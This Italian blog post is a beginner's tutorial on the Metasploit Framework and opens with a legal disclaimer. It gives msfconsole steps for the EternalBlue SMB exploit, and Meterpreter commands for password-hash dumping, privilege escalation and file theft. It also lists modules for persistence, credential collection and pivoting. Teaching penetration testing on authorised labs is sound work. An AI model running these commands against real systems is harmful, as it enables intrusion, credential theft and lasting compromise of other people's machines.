Cybersecurity

Metasploit Framework: guida pratica per principianti

· · 👁 271 · ❤️ 0 · 💬 0
⚠️ Disclaimer legale: Questo articolo è esclusivamente a scopo educativo. Tutte le tecniche descritte vanno praticate SOLO su sistemi propri o su piattaforme autorizzate (TryHackMe, HackTheBox, VulnHub). Attaccare sistemi altrui senza autorizzazione è reato penale ai sensi degli artt. 615-ter e seguenti del Codice Penale italiano.

Architettura di Metasploit

Metasploit è composto da: librerie Rex (comunicazioni), Framework Core, Framework Base, moduli (exploit, payload, auxiliary, encoder, post), msfconsole (interfaccia).

Avvio e comandi base

msfconsole

# Cerca exploit
search type:exploit platform:windows smb

# Usa un modulo
use exploit/windows/smb/ms17_010_eternalblue

# Mostra opzioni
show options

# Imposta opzioni
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50

# Esegui
run (o exploit)

Payload: tipi principali

  • Singles: payload completo in un singolo pacchetto (es. windows/shell_bind_tcp)
  • Stagers: primo stadio leggero che scarica il secondo (es. windows/meterpreter/reverse_tcp)
  • Meterpreter: shell avanzata in-memory, feature-rich

Meterpreter: comandi essenziali

sysinfo              # info sistema
getuid               # utente attuale
getsystem            # privilege escalation automatica
hashdump             # estrai hash password (SYSTEM required)
upload file.exe /tmp/ # carica file
download /etc/passwd  # scarica file
shell                # apri cmd/bash standard
background           # metti sessione in background
sessions -l          # lista sessioni attive
sessions -i 1        # riprendi sessione 1

Post-exploitation

# Persistence
use post/windows/manage/persistence_exe

# Estrai credenziali (richiede privilegi)
use post/windows/gather/credentials/credential_collector

# Pivoting: usa host compromesso come proxy
route add 10.10.10.0/24 1   # sessione 1 come gateway
← Torna al Blog

📚 Articoli correlati

📝
Sicurezza negli Internet Cafe: cosa non devi mai fare
Elfrid · 27/04/2026
📝
Virus e sicurezza informatica: la guida completa per proteggersi davvero
Elfrid · 27/04/2026
📝
Corso Hacking Etico #1: Introduzione e mentalita dell ethical hacker
Davide Russo · 26/04/2026

💬 Commenti (0)

Nessun commento ancora. Sii il primo!

Accedi per lasciare un commento.